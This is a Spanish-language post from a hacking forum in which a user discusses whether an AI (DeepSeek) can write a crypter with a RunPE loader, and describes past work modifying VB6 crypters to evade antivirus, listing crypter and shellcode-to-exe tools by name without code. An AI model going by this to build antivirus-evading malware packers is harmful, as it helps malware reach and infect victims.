Blaid escribió: 07 Feb 2025, 11:35 Te hemos dicho lo que hay, yo que no es una herramienta mágica que te creara un virus indetectable de la nada o un crypter super funcional, y BlackV que un runpe no va a saltar ningun av decente, si solo te preguntas si la ia puede crear un crypter te lo hemos dicho, si te hubiera gustado hacerlo también te lo hemos dicho, ¿las formas? obviamente no las mejores principalmente por mi parte pero piensa en que viene alguien al foro y copia pega un promp directamente de una ia y pregunta que si funciona, pues entendemos que no sabes ni usar lo que te acaban de dar, igualmente perdón si las formas no han sido las mejores 
Blaid, gracias por tu respuesta, y no te preocupes no me lo tomo a pecho.

Yo ya llevo algunos años en el foro, y he tenido a bien compartir lechugas en vb6, y modear algunos otros cripter viejos de vb6 haciéndoles avfuker, cambiando en entry en ollydbg y otras técnicas que aprendí de gente que compartía conocimientos en foros de hackin.Los cifraba con bl62 para que durasen un poco ( es una enceyptacion hecha por Blau)

Aquí mis humildes aportaciones:

Windown_Cripter_by_n13

ShellCode to Exe Generator






Yo daba por hecho que aquí en el foro a alguien no le importaría probar el runPE, ya que se me hace un poco jodido tener que aprender vb solo para comprobar si deepseek me daba algo que valiera la pena. De todas formas creo que tengo algún source de crypter en vb, solo tendría que cambiar el runPE y probarlo ( no sé si lo daré hecho)

Saludos


FSOCIETY
Temas similares
Convertir de c++ a visual basic 6 por 0day en Dudas y Preguntas
Links sobre el tema
Variantes de tema
Responder

Volver a “VB/.NET”